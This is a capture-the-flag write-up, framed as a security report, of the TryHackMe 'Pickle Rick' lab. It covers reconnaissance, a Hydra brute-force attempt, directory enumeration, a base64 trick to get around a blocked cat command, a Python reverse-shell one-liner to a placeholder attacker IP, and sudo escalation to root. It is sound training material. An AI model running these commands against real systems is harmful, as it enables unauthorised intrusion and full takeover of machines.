Technical Report

Detailed analysis for technical teams, covering methodologies, tools, and findings.

Technical Security Report: "Pickle Rick" System

Purpose of the Report

This report documents a simulated security assessment conducted on the "Pickle Rick" system from TryHackMe. The objective was to identify and exploit vulnerabilities, demonstrate potential attack paths, and highlight key areas for security improvement.


Methodology

The assessment was executed using a structured approach:

  1. Reconnaissance: Identifying open ports and services via Nmap.

  2. Enumeration: Analyzing web pages and source code to gather user credentials and hidden information.

  3. Exploitation: Leveraging brute-force techniques, directory enumeration, and command execution to gain further access.

  4. Privilege Escalation: Establishing a reverse shell and escalating privileges to achieve root access.


Detailed Findings

1. Initial Reconnaissance

  • Tool Used: Nmap

  • Command Executed:

    sudo nmap -F -T5 -sCV <target_ip>
  • Results: Two open ports were identified:

    • Port 80: HTTP service.

    • Port 22: SSH service.

  • Impact: The discovery of these ports set the foundation for further targeted testing.

2. Web Service Analysis

  • Procedure:

    • Visited http://<target_ip>:80, revealing a message from Rick requesting help due to a forgotten password.

    • Examined the page source (via Ctrl+U or using curl http://<target_ip>) which exposed the username R1ckRul3s.

  • Impact: The extraction of the username provided a critical credential for subsequent authentication attempts.

3. SSH Brute-Force Attempt

  • Tool Used: Hydra

  • Command Executed:

    hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<target_ip>
  • Results: The SSH service did not support password authentication.

  • Impact: This method was abandoned in favor of web-based enumeration.

4. Directory Enumeration and Admin Login

  • Tool Used: Dirbuster

  • Procedure:

    • Ran Dirbuster to enumerate directories on the HTTP service.

    • Discovered that accessing /portal.php redirected to login.php, an administrative login page.

  • Authentication Attempts:

    • Tried common passwords (e.g., Password123, admin, root) with no success.

    • Reviewed the robots.txt file, which revealed a potential password.

    • Result: The discovered password allowed successful login to the admin panel.

  • Impact: Gaining access to the admin interface provided an in-browser terminal for command execution.

5. Command Execution and File Discovery

  • Procedure:

    • Executed commands (whoami, ls -la) via the admin terminal.

    • Identified a file named Sup3rS3cretPickl3Ingred.txt.

    • The cat command was blocked; instead, the file was read using:

      base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode
  • Results: Successfully retrieved the contents (first secret ingredient).

  • Impact: Obtaining the first ingredient validated the ability to execute system commands.

6. Establishing a Reverse Shell

  • Preparation:

    • Verified Python 3 availability with python3 --version.

    • Employed the reverse shell script from Pentestmonkey.

  • Commands Executed:

    • On the Attacker Machine:

      nc -lnvp 8888
    • On the Target (via the admin terminal):

      python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Result: An interactive reverse shell was established.

  • Impact: The reverse shell provided a robust foothold, facilitating deeper system exploration.

7. Privilege Escalation to Root

  • Procedure:

    • Tested for sudo access; executing:

      sudo /bin/bash
  • Result: Obtained root-level access.

  • Impact: Full system control was achieved, allowing unrestricted enumeration and file access.

8. Final Enumeration and Retrieval of Remaining Ingredients

  • Procedure:

    • Enumerated the root home directory to locate additional secret ingredients.

    • Read the file 3rd.txt to retrieve another ingredient.

    • Inspected /home to identify the rick user's directory, which contained the final secret ingredient.

  • Impact: All required ingredients were successfully retrieved, completing the challenge.


Conclusion

The assessment of the "Pickle Rick" system showcased a methodical exploitation process—from initial reconnaissance and web-based enumeration to reverse shell establishment and privilege escalation. The successful extraction of all secret ingredients highlights vulnerabilities such as exposed administrative interfaces, weak authentication, and inadequate command restrictions. This exercise underscores the importance of robust service configurations, strong authentication practices, and continuous security monitoring to mitigate potential risks.

Last updated